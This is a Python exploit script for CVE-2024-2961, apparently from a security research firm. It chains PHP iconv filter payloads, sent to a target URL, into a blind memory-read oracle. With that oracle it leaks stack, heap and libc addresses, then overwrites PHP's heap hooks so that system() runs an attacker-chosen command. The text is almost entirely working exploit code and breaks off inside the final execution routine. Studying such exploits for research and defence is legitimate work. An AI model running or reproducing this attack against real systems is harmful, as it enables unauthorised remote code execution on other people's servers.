#!/usr/bin/env python3 # # Blind CNEXT: Blind PHP file read to RCE (CVE-2024-2961) # Date: 2024-09-30 # Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS) # # INFORMATIONS # # To use, implement the Remote class, which tells the exploit how to send the payload # and how to verify that the blowup happened, i.e. that PHP went OOM. # # TODO # # If you feel like improving the exploit, please submit a PR. Here are some improvement # ideas: # # - Automatic configuration of the oracle # - Handle multithreading # - Handle non-PIE ELFs # - Properly handle ELF endianness # - Use the libc's Build ID to find system faster # - Verify that we properly dump addresses that contain newline characters # # DEBUGGING # # This exploit is complex, and I may have made mistakes. Although it is built not to # crash, it is a binary exploit, so it might anyway. # # If you encounter any issue, please provide the following information: # # - The full output of the exploit, with the `-d` flag # - The exact code of the PHP page that is being attacked, or better, a docker image # # Unless I see both, issues will be automatically closed. # # # TECHNICAL # # The exploit is a blind file read to RCE in PHP, using the iconv filter. Its behavior # is documented in the following blog posts: # # https://www.ambionics.io/blog/iconv-cve-2024-2961-p1 # https://www.ambionics.io/blog/iconv-cve-2024-2961-p3 # from __future__ import annotations import base64 import itertools import zlib from collections import Counter from dataclasses import dataclass, field from typing import NoReturn from requests.exceptions import ConnectionError, ChunkedEncodingError import time from rich.align import Align from rich.rule import Rule from ten import * import struct set_message_formatter("Icon") # sys.path.append(os.path.join(os.path.dirname(__file__), "php_filter_chains_oracle_exploit")) from php_filter_chains_oracle_exploit.filters_chain_oracle.core.bruteforcer import ( Bruteforcer, ) MAX_COMPRESSED_LEN = 1500 MAX_PATH_LEN = 9000 from tenlib import logging # -- Constants HEAP_SIZE = 2 * 1024 * 1024 BUG = "劄".encode("utf-8") MIN_NB_400_CHUNKS = 100 CS = 0x400 # bin=23, chunks=8, pages=2 ZERO_CHUNK = b"0" * CS ZERO_CHUNK_30 = b"0" * 0x30 NB_30_CHUNKS = 85 * 5 NB_30_CHUNKS_2 = NB_30_CHUNKS + 85 * 5 PAGE_SIZE = 0x1000 PHP_ELF_MIN_PAGE_DISTANCE = 1500 PHP_ELF_MAX_PAGE_DISTANCE = 3000 class Remote: """A helper class to send the payload and check whether a blowup happened. The logic of the exploit is always the same, but the exploit needs to know how to send the payload and how to check if a blowup happened. A blowup is when PHP tries to allocate too much memory and returns an error such as: Allowed memory size of 134217728 bytes exhausted The code here serves as an example that attacks a page that looks like: ```php None: self.url = url self.session = Session() def oracle(self, path: str) -> bool: """Sends given `path` to the HTTP server. Returns whether a blowup happened.""" write("/tmp/payload", path) try: response = self.session.post(self.url, data={"file": path}) except ConnectionError: raise RuntimeError("Connection error, server crashed or timeout!") return response.contains("Allowed memory size of") @entry @arg("url", "Target URL") @arg("command", "Command to run on the system; limited to 0x140 bytes") @arg("sleep", "Time to sleep to assert that the exploit worked. By default, 1.") @arg("alignment", "Number of 0x400 chunks to spawn so that we overflow into the penultimate one of a page.") @arg("brig_inp", "Address of the brig_inp variable on the stack.") @arg("heap", "Address of the zend_mm_heap object.") @arg("php_elf", "Address of the PHP ELF in memory.") @arg("zval_ptr_dtor", "Address of `zval_ptr_dtor` in memory.") @arg("libc_elf", "Address of the libc ELF in memory.") @arg("system", "Address of the `system` function in the libc.") @arg("malloc", "Address of the `malloc` function in the libc.") @arg("realloc", "Address of the `realloc` function in the libc.") @arg("debug", "Display DEBUG log messages in the CLI.") @dataclass class Exploit: """Blind CNEXT exploit: RCE using a blind file read primitive in PHP, using CVE-2024-2961. cfreal @ LEXFO/AMBIONICS """ url: str command: str alignment: int = None brig_inp: str = None heap: str = None php_elf: str = None zval_ptr_dtor: str = None libc_elf: str = None system: str = None malloc: str = None realloc: str = None sleep: int = 1 debug: bool = False BLOW_UP_UTF32 = "convert.iconv.L1.UCS-4" BLOW_UP_INFINITY = [BLOW_UP_UTF32] * 15 # TODO Is it really needed now? FILTER_USAGE = ( # Base filters Counter( { "zlib.inflate": 3, "dechunk": 5, "convert.iconv.L1.L1": 2, "convert.iconv.UTF-8.ISO-2022-CN-EXT": 1, "zlib.deflate": 1, "convert.base64-encode": 1, } ) # Character selection + Counter( { # "convert.base64-decode": 70, # "convert.base64-encode": 70, "convert.iconv.UTF8.CSISO2022KR": 42, "convert.iconv.JS.UNICODE": 14, "convert.iconv.L4.UCS2": 14, "convert.iconv.UTF-16LE.UTF-16BE": 8, "convert.iconv.UCS-4LE.UCS-4": 8, "convert.iconv.L1.UTF7": 6, } ) # Other script + Counter( { "dechunk": 1, "convert.iconv.L1.UCS-4": 15, "convert.iconv.437.CP930": 6, "convert.quoted-printable-encode": 5, "convert.iconv..UTF7": 5, "convert.base64-decode": 5, "convert.base64-encode": 6, "string.tolower": 2, "convert.iconv.CSISO5427CYRILLIC.855": 1, "convert.iconv.CP1390.CSIBM932": 5, # was 1, bumped to 5 "string.rot13": 2, "convert.iconv.CP285.CP280": 1, "string.toupper": 1, "convert.iconv.CP273.CP1122": 1, "convert.iconv.500.1026": 1, "convert.iconv.UTF8.IBM1140": 1, "convert.iconv.CSUNICODE.UCS-2BE": 1, "convert.iconv.UTF8.CP930": 1, } ) ) # FILTER_USAGE = Counter() # Oracle tests to determine if the base64 digit is what we expect FAST_PATH = { "f": [ (False, ["convert.iconv.CP1390.CSIBM932"] * 5), (False, []), ], "g": [ (False, ["convert.iconv.CP1390.CSIBM932"]), (True, []), ], "A": [ ( False, [ "string.tolower", "convert.iconv.437.CP930", "convert.quoted-printable-encode", "convert.iconv..UTF7", "convert.base64-decode", "convert.base64-encode", "convert.iconv.437.CP930", "convert.quoted-printable-encode", "convert.iconv..UTF7", "convert.base64-decode", "convert.base64-encode", "convert.iconv.437.CP930", "convert.quoted-printable-encode", "convert.iconv..UTF7", "convert.base64-decode", "convert.base64-encode", "convert.iconv.437.CP930", "convert.quoted-printable-encode", "convert.iconv..UTF7", "convert.base64-decode", "convert.base64-encode", "convert.iconv.437.CP930", ], ), ( True, [ "convert.iconv.437.CP930", "convert.quoted-printable-encode", "convert.iconv..UTF7", "convert.base64-decode", "convert.base64-encode", "convert.iconv.437.CP930", "convert.quoted-printable-encode", "convert.iconv..UTF7", "convert.base64-decode", "convert.base64-encode", "convert.iconv.437.CP930", "convert.quoted-printable-encode", "convert.iconv..UTF7", "convert.base64-decode", "convert.base64-encode", "convert.iconv.437.CP930", "convert.quoted-printable-encode", "convert.iconv..UTF7", "convert.base64-decode", "convert.base64-encode", "convert.iconv.437.CP930", ], ), ], "B": [ (False, ["string.tolower", "convert.iconv.CP1390.CSIBM932"]), ( True, [ "string.tolower", "convert.iconv.CP1390.CSIBM932", "convert.iconv.CP1390.CSIBM932", ], ), (True, ["convert.iconv.CP1390.CSIBM932"]), ], } def __post_init__(self) -> None: self.remote = Remote(self.url) self.logger = logger("EXPLOIT") self.info = {} # # Building and sending payload # def _get_response(self, filters: list[str], resource: str) -> Response: path = self._build_filter_payload(filters, resource) response = self.remote.oracle(path) log.trace( f"Sending {len(path):#x} payload results in a response of {len(response.content)} bytes" ) return response def oracle(self, filters: list[str], resource: str) -> bool: """Returns true if the expansion happened, false otherwise.""" path = self._build_filter_payload(filters, resource) blowup = self.remote.oracle(path) self.logger.trace(f"Sending payload of size {len(path)} results in {blowup=}") return blowup def _build_filter_payload(self, filters: list[str], resource: str) -> str: read = "|".join(filters) write = self._compute_write(filters) path = f"php://filter/read={read}/write={write}/resource={resource}" return path @classmethod def _compute_write(cls, filters: list[str]) -> str: """To make sure that the heap does not change too much, we add dummy filters so that PHP creates the associated structures. They do not impact our exploit, as they are write filters. However, they will be called when the stream is finally freed, at the end of the execution. We thus convert any funky charset to latin1, to make sure PHP does not report errors. This also makes sure that the length of the path is always the same. Although this is very helpful, this is not perfect. The order in which the filters are created matters as well. However, we cannot control this perfectly. """ filters = Counter(filters) missing = [] for filter, number in cls.FILTER_USAGE.items(): used = filters.get(filter, 0) if filter.startswith("convert.iconv."): _, _, ffrom, fto = filter.split(".") if len(ffrom) >= 2: ffrom = "L1".ljust(len(ffrom), " ") if len(fto) >= 2: fto = "L1".ljust(len(fto), " ") filter = f"convert.iconv.{ffrom}.{fto}" if used < number: missing += [filter] * (number - used) # assert (Counter(missing) + Counter(filters) == Counter(cls.FILTER_USAGE)) return "|".join(missing) # # Exploit logic # def find_chunk_alignment(self) -> int: """Determines the required number of 0x400 chunks to overflow into the penultimate one, yielding a A->B->C' chain with C overflowing into the next page. """ assert self.alignment is None # We should only need 8, in theory, but this won't hurt too much for i in track( range(MIN_NB_400_CHUNKS, MIN_NB_400_CHUNKS + 8), "Looking for chunk alignment", ): if self._try_big_chunks_alignment(i): break else: # TODO CHECK IF VULNERABLE failure("Unable to find heap alignment; is the target vulnerable?") msg_success(f"Found alignment for [i]0x400[/] chunks: {i} {option_help('-a')}") self.alignment = i def _try_big_chunks_alignment(self, alignment: int) -> bool: # After the overflow, PHP will allocate a chunk twice as big to store the iconv' # ed buffer. Since there was a one byte overflow, the byte at offset 0x100 in # the new out_buf (of size 0x200) will keep its value. If this value is 0x0A, it # will break the logic of the code (the `dechunk` that comes right after will # fail). To avoid this, we create, early in the algorithm, a chunk of size 0x200 # that will be the head of the FL. step1_800 = [b"0" * CS * 2] step1_400 = [ZERO_CHUNK] * alignment step1_30 = [ZERO_CHUNK_30] * NB_30_CHUNKS step1 = self.build_conserved_chunks(step1_800 + step1_400 + step1_30, step=1) PTR_CHUNK = bytearray(ZERO_CHUNK) put(PTR_CHUNK, 0x48 - 8 * 2, b"0000013\n0000001-" + p64(0) + b"\n0\n\n") step2 = [PTR_CHUNK] + [ZERO_CHUNK] * 2 step2 = self.build_conserved_chunks(step2, step=2) # Overflow step step3_overflow = bytearray(b"0" * CS) put(step3_overflow, -len(BUG), BUG) put(step3_overflow, -len(BUG) - 3, b"1e-") tapis = bytearray(b"T" * CS) put(tapis, -0x48 + 0x30 - 5, b"\na\nff" + p64(0) + b"\nAAABBBB" + p64(0)) end_chunk = bytearray(b"E" * CS) put(end_chunk, 0, b"\nX\n") step3 = ( [step3_overflow] + [b"0"] + [ZERO_CHUNK] * 2 + [tapis] + [end_chunk] + [b"3" * 0x30] * (NB_30_CHUNKS_2) ) step3 = self.build_conserved_chunks(step3, step=4) pages = b"" + step1 + step2 + step3 resource = self._data_to_resource(pages) base_filters = ( Filters.base(3) # Step 5: Remove data if possible + [ "dechunk", "dechunk", "dechunk", ] + self.BLOW_UP_INFINITY ) return self.oracle(base_filters, resource) def dump_memory(self, address: int, size: int, message: str = None) -> None: """Dumps `size` bytes of memory at `address`. """ total = b"" if message: message = message.format(address=address, size=size) generator = lambda: track(range(0, size, 3), message) else: generator = lambda: range(0, size, 3) for p in generator(): hope = self.dump_3(address + p, nb_bytes=size - p) total += base64.decode(hope) # print(hexdump(total, total=False)) return total def expect_memory(self, address: int, expected: bytes) -> bool: """Returns true if the memory at `address` matches the `expected` bytes. """ size = len(expected) for p in range(0, size, 3): try: self.dump_3(address + p, expected=expected[p : p + 3]) except UnexpectedBytesException: return False return True def _maybe_convert_arguments(self) -> None: for attr in ("brig_inp", "heap", "zval_ptr_dtor", "php_elf", "libc_elf", "system", "malloc", "realloc"): value = getattr(self, attr) if value is not None: setattr(self, attr, unhex(value)) def run(self) -> None: if self.debug: logging.set_cli_level("DEBUG") self._maybe_convert_arguments() got_final_params = self.heap and self.system and self.malloc and self.realloc # We need to find out at least one parameter before we can execute code if not got_final_params: # Do we have everything we need to perform arbitrary reads? if not self.alignment or not self.brig_inp: msg_print(Rule("READ PRIMITIVE")) if not self.alignment: self.find_chunk_alignment() if not self.brig_inp: self.leak_stack_address() # Do we have the heap? If we do, do we need to find the PHP ELF ? if not self.heap or not (self.system or self.libc_elf or self.php_elf or self.zval_ptr_dtor): msg_print(Rule("HEAP")) if not self.heap: self.find_heap_address() if not self.zval_ptr_dtor: self.find_zval_ptr_dtor() # Do we have the PHP ELF? If we don't, do we need it? if not (self.php_elf or self.libc_elf or self.system): msg_print(Rule("PHP ELF")) self.find_php_elf() address = self.find_some_libc_function() if not self.libc_elf: msg_print(Rule("LIBC ELF")) self.find_libc_elf(address) self.find_libc_functions() msg_print(Rule("CODE EXECUTION")) self.execute() def find_some_libc_function(self) -> int: php = ELFDumper(self, self.php_elf) php.get_dynamic_section() php.get_dynamic_segments("STRTAB", "SYMTAB", "JMPREL") return php.find_some_libc_function() def find_libc_elf(self, address: int): """Finds the address of the libc ELF in memory from a function it contains. """ assert self.libc_elf is None libc = self._find_elf_header(address, 0, PHP_ELF_MAX_PAGE_DISTANCE) msg_success(f"Found [i]libc[/] ELF at {addr(libc)} {option_help('-l')}") self.libc_elf = libc def find_libc_functions(self) -> None: assert self.system is None elf = ELFDumper(self, self.libc_elf) elf.setup_gnu_hash() for symbol in ("system", "malloc", "realloc"): try: function = elf.find_symbol_from_hash(symbol) except ValueError as e: failure(str(e)) function += elf.base shortcut = f"-{symbol[0]}" msg_success(f"Found [i]{symbol}@libc[/] at address {addr(function)} {option_help(shortcut)}") setattr(self, symbol, function) def russian_doll(self, payload: bytes, *sizes) -> bytes: """Returns a payload that, when successively dechunked, has its size changed to `sizes`. """ for size in sizes: if size < 0: size = len(payload) - size elif size == 0: size = len(payload) + 8 payload = chunked_chunk(payload, size) payload = compressed_bucket(payload) return payload def _data_to_resource(self, data: bytes) -> str: """Converts the given bytes to a `data://` url. Compresses the input twice.""" resource = compress(compress(data)) if len(resource) > MAX_COMPRESSED_LEN: failure(f"Resource too big: {len(resource)} > {MAX_COMPRESSED_LEN}") # resource = resource.ljust(MAX_COMPRESSED_LEN, b"A") # The resource will be B64-decoded into a zend_string, so we need to make sure # that this does not account to a zend_string of size 0x400, which would mess # with our setup. resource = resource.ljust(0x400, b"\x00") resource = b64(resource) resource = f"data:text/plain;base64,{resource.decode()}" return resource def ptr_bucket(self, *ptrs, size: int, strip: int = 0) -> bytes: """Creates a 0x8000 chunk that reveals pointers after every step has been ran.""" bucket = b"".join(map(p64, ptrs)) if strip: bucket = bucket[:-strip] if size is not None: assert len(bucket) == size, f"{len(bucket):#x} != {size=:#x}" bucket = qpe(bucket) bucket = self.russian_doll(bucket, 0, 0, 0) return bucket def leak_stack_address(self): """Overwrites a buffer that we control with a php_stream_bucket structure and uses it to leak the address of the stack. The general idea is to displace the last 0x400 chunk of a page, allocate it, and then allocate buckets in the page right after. Buckets get "imprinted" into the chunk, and we can then extract the pointers. A naive implementation, although very small, easy to understand, and classy, may yield crashes in 1/8 cases. If we overflow from the penultimate 0x400 chunk, we overwrite a pointer to NULL, and the upcoming allocation crashes. We can avoid this by first setting up the freelist (ensuring there are enough chunks), then doing the process. It greatly complexifies the exploit, because now we need to allocate lots chunks of size 0x30 right after we setup the 0x400 FL (step1), but then free them all before we overflow and displace the chunk, so that we can finally reallocate them, and have them be imprinted into the chunk. It's all a matter of doing things in order: we want to setup our heap, then clear it, and then imprint the buckets. The "naive" payload is twice as big (2000 against 1000) but it avoids crashes. We're doing web stuff, we don't want crashes. """ assert self.brig_inp is None # After the overflow, PHP will allocate a chunk twice as big to store the iconv' # ed buffer. Since there was a one byte overflow, the byte at offset 0x100 in # the new out_buf (of size 0x200) will keep its value. If this value is 0x0A, it # will break the logic of the code (the `dechunk` that comes right after will # fail). To avoid this, we create, early in the algorithm, a chunk of size 0x200 # that will be the head of the FL. step1_800 = [b"0" * CS * 2] step1_400 = [ZERO_CHUNK] * self.alignment step1_30 = [ZERO_CHUNK_30] * NB_30_CHUNKS step1 = self.build_conserved_chunks(step1_800 + step1_400 + step1_30, step=1) PTR_CHUNK = bytearray(ZERO_CHUNK) put(PTR_CHUNK, 0x48 - 8 * 2, b"0000013\n0000001-" + p64(0) + b"\n0\n\n") step2 = [PTR_CHUNK] + [ZERO_CHUNK] * 2 step2 = self.build_conserved_chunks(step2, step=2) # Overflow step step3_overflow = bytearray(b"0" * CS) put(step3_overflow, -len(BUG), BUG) put(step3_overflow, -len(BUG) - 3, b"1b-") tapis = bytearray(b"T" * CS) put(tapis, -0x48 + 0x30 - 1, b"\n") put(tapis, -0x48 + 0x30, p64(0)) end_chunk = bytearray(b"E" * CS) put(end_chunk, 3, b"\n") step3 = ( [step3_overflow] + [b"0"] + [ZERO_CHUNK] * 2 + [tapis] + [end_chunk] # protect misplaced chunk from being used + [ZERO_CHUNK] * 2 + [b"3" * 0x30] * (NB_30_CHUNKS_2) ) step3 = self.build_conserved_chunks(step3, step=4) pages = b"" + step1 + step2 + step3 resource = self._data_to_resource(pages) base_filters = Filters.base(3) + [ "dechunk", "convert.base64-encode", ] full_dump = "" resource = self._data_to_resource(pages) wanted_digits = range(21, 28) for i in track( wanted_digits, "Extracting stack pointer", ): # Build a list of filters that puts the character we're interested in in # front quartet, digit = divmod(i, 4) quartet_filters = (Filters.REMOVE_EQUALS + Filters.DITCH_4) * quartet digit_filters = Filters.QUARTET_DIGITS[digit] + quartet_filters[1:] digit_filters = base_filters + digit_filters bruteforcer = LinkedBruteforcer(self, digit_filters, resource) for digit, _ in bruteforcer.bruteforce(): full_dump += digit break else: failure("Unable to find character") pointer_part = base64.decode("A" + full_dump)[1:] brig_inp = u64(pointer_part + b"\x7f\x00\x00") brig_inp = brig_inp + 0x10 msg_success(f"Got (stack) address of [i]brig_inp[/]: {addr(brig_inp)} {option_help('-b')}") self.brig_inp = brig_inp def _build_bucket(self, address: int, size: int) -> bytes: """Builds a bucket whose buffer has size `size` and points to the given `address`. """ return b"".join( map( p64, [ 0x00, # next 0x00, # prev self.brig_inp, # brigade address, # buf size, # len 0x10_0000_00_00, # refcount hole is_persistent own_buf ], ) ) def find_heap_address(self) -> None: """Reads the stack to extract a pointer to a bucket, and then leaks the address of the zend_mm_heap object. """ assert self.heap is None md = MemoryDumper(self, 0) (bucket,) = md.unpack( self.brig_inp - 0x10, " None | NoReturn: """Uses the fast_path tests to determine if the digit is `expected_digit`. """ fast_path = self.FAST_PATH[expected_digit] for keep_if_blow, test_filters in fast_path: test_filters = ( filters + test_filters + ["dechunk"] + self.BLOW_UP_INFINITY ) blew_up = self.oracle(test_filters, resource) if keep_if_blow != blew_up: break else: self.logger.trace(f"Fast path hit for digit {expected_digit}") return self.logger.trace(f"Fast path missed for digit {expected_digit}") raise UnexpectedBytesException() def dump_3(self, address: int, expected: str = None, nb_bytes: int = 3) -> None: """Dumps 3 bytes (4 base64 digits) from `address`.""" # In step 1, we allocate lots of 0x400 chunks to setup the heap, and then right # after we allocate 0x30 chunks. The latter will stay, while the former will be # removed on the next step. # After the overflow, PHP will allocate a chunk twice as big to store the iconv' # ed buffer. Since there was a one byte overflow, the byte at offset 0x400 in # the new out_buf (of size 0x800) will keep its value. If this value is 0x0A, it # will break the logic of the code (the `dechunk` that comes right after will # fail). To avoid this, we create, early in the algorithm, a chunk of size 0x200 # that will be the head of the FL. step1_800 = [b"0" * CS * 2] step1_400 = [ZERO_CHUNK] * self.alignment step1 = self.build_conserved_chunks(step1_800 + step1_400, step=1) step1_30 = [ZERO_CHUNK_30] * NB_30_CHUNKS step1_30 = self.build_conserved_chunks(step1_30, dechunks=2) step1 += step1_30 # In step 2, we put a NULL pointer in the last chunk of the page, and then we # reverse the free list for 3 elements A B C. The 0x30 chunks do not move. # We make the chunk that contains the fake pointer a doubly-chunked chunk, so # that we don't break the dechunk chain PTR_CHUNK = bytearray(ZERO_CHUNK) put(PTR_CHUNK, 0x48 - 8 * 2, b"0000013\n0000001-" + p64(0) + b"\n0\n\n") step2 = [PTR_CHUNK] + [ZERO_CHUNK] * 2 step2 = self.build_conserved_chunks(step2, step=2) # In step 3, we overflow from A into B to change its next pointer to C+48h. step3_overflow = bytearray(ZERO_CHUNK) put(step3_overflow, -len(BUG), BUG) put(step3_overflow, -len(BUG) - 4, b"1b-") step3 = [step3_overflow, b"0"] step3 = self.build_conserved_chunks(step3, step=3) # In step 4, we overwrite a bucket BUCKET = self._build_bucket(address, 3) # TODO for loop this # TODO properly implemented? newlines = BUCKET.count(b"\x0a") match newlines: case 0: prefix = b"ffff-" case 1: prefix = b"5\nffff-\nffff-" case 2: prefix = b"d\n5\nffff-\nffff-\nffff-" case _: msg_debug("Leaking addresses that contain more than 2 newlines is DOABLE, just not implemented yet") failure("Cannot leak address: contains too many newlines") dechunks = ["dechunk"] * (newlines + 1) # Every chunk created here will preceed the data we want to leak. We need to # make it dechunkable. If addresses didn't contain newlines, it would be easy # enough. step5_overwrite_bucket = bytearray(ZERO_CHUNK) put(step5_overwrite_bucket, -0x48, BUCKET) put(step5_overwrite_bucket, -0x48-len(prefix), prefix) # Get rid of the last bytes: we don't want to overwrite the second bucket of # the page step5_overwrite_bucket = step5_overwrite_bucket[:-0x18] # Final chunk: directly preceeds the leaked data final = bytearray(ZERO_CHUNK) put(final, -1, b"\n") step5 = [ZERO_CHUNK, ZERO_CHUNK, step5_overwrite_bucket, ZERO_CHUNK, ZERO_CHUNK, ZERO_CHUNK, final] step5 = [qpe(chunked_chunk(chunk, CS*2)) for chunk in step5] step5 = self.build_conserved_chunks(step5, step=3) step4 = b"" # Merge pages pages = step5 + step4 + step1 + step2 + step3 resource = self._data_to_resource(pages) base_filters = Filters.base(2) + [ "convert.iconv.L1.L1", # Step 4: Overwrite buffer "convert.quoted-printable-decode", "dechunk", "convert.iconv.L1.L1", # Step 5: Remove the stuff preceding the leaked data ] + dechunks + [ # Step 6: Inprint the data # "zlib.deflate", # "zlib.inflate", "convert.base64-encode", ] # The four (or less, if nb_bytes if lower) characters that we need to dump quartet = "" # If some characters in the B64 quartet are expected, we can check if a fast # path exists for them, and hit it instead of bruteforcing the digit and then # comparing it to the expected value. # b64_expected represents every B64 digit that is expected. We cannot # naively convert to B64 because some bytes may be incomplete. # # Quick example: we expect b"Z", so we b64-encode and get "Wg==". In this, W # encodes the first 6 bits of Z, and g the last 2. We cannot naively compare g # with the second character of the leak, because the latter also encodes the 4 # first bits of the second byte of memory. if expected: b64_expected = b64(expected).decode() match len(expected): case 1: b64_expected = b64_expected[:1] case 2: b64_expected = b64_expected[:2] case 3: pass else: b64_expected = "" for i, get_digit in enumerate(Filters.QUARTET_DIGITS): if len(quartet) > nb_bytes: break filters = base_filters + get_digit if i < len(b64_expected) and b64_expected[i] in self.FAST_PATH: base64_digit = b64_expected[i] self._try_fast_path(filters, resource, base64_digit) quartet += base64_digit continue bruteforcer = LinkedBruteforcer(self, filters, resource) for digit, _ in bruteforcer.bruteforce(): break else: failure("Could not find the character") quartet += digit # We compare the size of a B64 to a normal byte array, but the comparison # still holds. if expected: self._check_quartet_chunk_is_expected(quartet, expected) if len(quartet) > len(expected): break self.logger.trace(f"Got quartet {quartet} for address {address:#x}") return quartet.ljust(4, "=") def _check_quartet_chunk_is_expected( self, quartet: str, expected: bytes ) -> None | NoReturn: """Checks that the dumped quartet matches what is expected.""" digits = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" def b64_number(data: bytes) -> int: return sum( digits.index(digit) << (6 * (3 - i)) for i, digit in enumerate(data) ) def number(data: bytes) -> int: return sum(byte << (8 * (2 - i)) for i, byte in enumerate(data)) mask = 24 - min(len(expected) * 8, len(quartet) * 6) mask = (1 << 24) - 1 - ((1 << mask) - 1) number_quartets = b64_number(quartet) & mask number_expected = number(expected) & mask # print(f"{number_quartets=:24b}") # print(f"{number_expected=:24b}") # print(f" {mask=:24b}") if number_quartets != number_expected: self.logger.debug( f"Expected {number_expected:03x} but got {number_quartets:03x}" ) raise UnexpectedBytesException() def build_conserved_chunks( self, buckets: list[bytes], dechunks: int = 0, step: int = 1 ) -> bytes: """Builds a list of chunks that will be conserved during the exploit.""" total_size = sum(map(len, buckets)) prefix = "" suffix = b"" wraps = [0] * (step - 1) for i in range(dechunks): current_size = i * 8 + total_size prefix = f"{current_size:06x}\n" + prefix suffix += b"\n" prefix = prefix.encode() if prefix: prefix = self.russian_doll(prefix, *wraps) suffix = self.russian_doll(suffix, *wraps) middle = b"".join(self.russian_doll(bucket, *wraps) for bucket in buckets) return prefix + middle + suffix def find_zval_ptr_dtor(self) -> int: """Finds the address of the `_zval_ptr_dtor` function in memory. To do so, we look for a page that contains `zend_array` structures, and then we look for the `pDestructor` field of the structure. """ assert self.zval_ptr_dtor is None skip_until = 0 heap = MemoryDumper(self, self.heap) for page in track(range(1, 512), "Looking for a [i]zend_array[/] page"): if page < skip_until: continue offset = -0x40 + 0x0208 + 4 * page (page_type,) = heap.dump(offset + 3, 1) if page_type == 0x40: (nb_pages,) = heap.unpack(offset, "> 40 in (0x7F, 0x55, 0x56): msg_info(f"Found [i]_zval_ptr_dtor[/]: {addr(pointer)} {option_help('-z')}") break else: failure("Unable to find [i]zval_ptr_dtor[/] in main heap") self.zval_ptr_dtor = pointer def _find_elf_header(self, address: int, min: int, max: int) -> int: """Finds the ELF header of a file given a function pointer.""" md = MemoryDumper(self, 0) address = address & ~(PAGE_SIZE - 1) distances = range(min, max) for i in track(distances, "Looking for ELF header"): page = address - PAGE_SIZE * i if md.expect(page, b"\x7fELF"): break else: failure("Unable to find ELF header") return page def find_php_elf(self) -> int: """Finds the PHP ELF file in memory. To do so, we find the first 0x38 page in the heap. We expect it to contain zend_arrays, and therefore their PDestructor field, which points to zval_ptr_dtor. We then look for the ELF header page by page, starting from zval_ptr_dtor. It takes ages, and is actually what prompted the implementation of the FAST_PATH. """ assert self.php_elf is None address = self._find_elf_header(self.zval_ptr_dtor, PHP_ELF_MIN_PAGE_DISTANCE, PHP_ELF_MAX_PAGE_DISTANCE) msg_success(f"Found PHP ELF header at {addr(address)} {option_help('-p')}") self.php_elf = address def execute(self) -> str: """On each step of the exploit, a filter will process each chunk one after the other. Processing generally involves making some kind of operation either on the chunk or in a destination chunk of the same size. Each operation is applied on every single chunk; you cannot make PHP apply iconv on the first 10 chunks and leave the rest in place. That's where the difficulties come from. Keep in mind that we know the address of the main heap, and the libraries. ASLR/PIE do not matter here. The idea is to use the bug to make the freelist for chunks of size 0x100 point lower. For instance, we have the following free list: ... -> 0x7fffAABBCC900 -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB00 By triggering the bug from chunk ..900, we get: ... -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB48 -> ??? That's step 3. Now, in order to control the free list, and make it point whereever we want, we need to have previously put a pointer at address 0x7fffAABBCCB48. To do so, we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at offset 0x48. That's step 2. Now, if we were to perform step2 an then step3 without anything else, we'd have a problem: after step2 has been processed, the free list goes bottom-up, like: 0x7fffAABBCCB00 -> 0x7fffAABBCCA00 -> 0x7fffAABBCC900 We need to go the other way around. That's why we have step 1: it just allocates chunks. When they get freed, they reverse the free list. Now step2 allocates in reverse order, and therefore after step2, chunks are in the correct order. Another problem comes up. To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-CN-EXT. Since step2 creates chunks that contain pointers and pointers are generally not UTF-8, we cannot afford to have that conversion happen on the chunks of step2. To avoid this, we put the chunks in step2 at the very end of the chain, and prefix them with `0\n`. When dechunked (right before the iconv), they will "disappear" from the chain, preserving them from the character set conversion and saving us from an unwanted processing error that would stop the processing chain. After step3 we have a corrupted freelist with an arbitrary pointer into it. We don't know the precise layout of the heap, but we know that at the top of the heap resides a zend_mm_heap structure. We overwrite this structure in two ways. Its free_slot[] array contains a pointer to each free list. By overwriting it, we can make PHP allocate chunks whereever we want. In addition, its custom_heap field contains pointers to hook functions for emalloc, efree, and erealloc (similarly to malloc_hook, free_hook, etc. in the libc). We overwrite them and then overwrite the use_custom_heap flag to make PHP use these function pointers instead. We can now do our favorite CTF technique and get a call to system(). We make sure that the "system" command kills the current process to avoid other system() calls with random chunk data, leading to undefined behaviour. The pad blocks just "pad" our allocations so that even if the heap of the process is in a random state, we still get contiguous, in order chunks for our exploit. Therefore, the whole process described here CANNOT crash. Everything falls perfectly in place, and nothing can get in the middle of our allocations. """ ADDR_EMALLOC = self.malloc ADDR_EFREE = self.system ADDR_EREALLOC = self.realloc ADDR_HEAP = self.heap ADDR_FREE_SLOT = ADDR_HEAP + 0x20 ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168 ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10 CS = 0x100 # Pad needs to stay at size 0x100 at every step pad_size = CS - 0x18 pad = b"\x00" * pad_size pad = self.russian_doll(pad, -6, -6, -6) step1_size = 1 step1 = b"\x00" * step1_size step1 = self.russian_doll(step1, 0, 0, CS) # Since these chunks contain non-UTF-8 chars, we cannot let it get converted to # ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash" step2_size = 0x48 step2 = b"\x00" * (step2_size + 8) step2 = self.russian_doll(step2, CS, 0) step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN) step2_write_ptr = self.russian_doll(step2_write_ptr, CS, 0) step3_size = CS step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG assert len(step3_overflow) == CS step3_overflow = self.russian_doll(step3_overflow, 0, 0, 0) step4_size = CS step4 = b"=00" + b"\x00" * (step4_size - 1) step4 = self.russian_doll(step4, 0, 0, 0) def ptr_bucket(*ptrs, size=None) -> bytes: """Creates a 0x8000 chunk that reveals pointers after every step has been ran.""" if size is not None: assert len(ptrs) * 8 == size bucket = b"".join(map(p64, ptrs)) bucket = qpe(bucket) bucket = self.russian_doll(bucket, 0, 0, 0) return bucket # This chunk will eventually overwrite mm_heap->free_slot # it is actually allocated 0x10 bytes BEFORE it, thus the two filler values step4_pwn = ptr_bucket( 0x200000, 0, # free_slot 0, 0, ADDR_CUSTOM_HEAP, # 0x18 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ADDR_HEAP, # 0x140 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, size=CS, ) 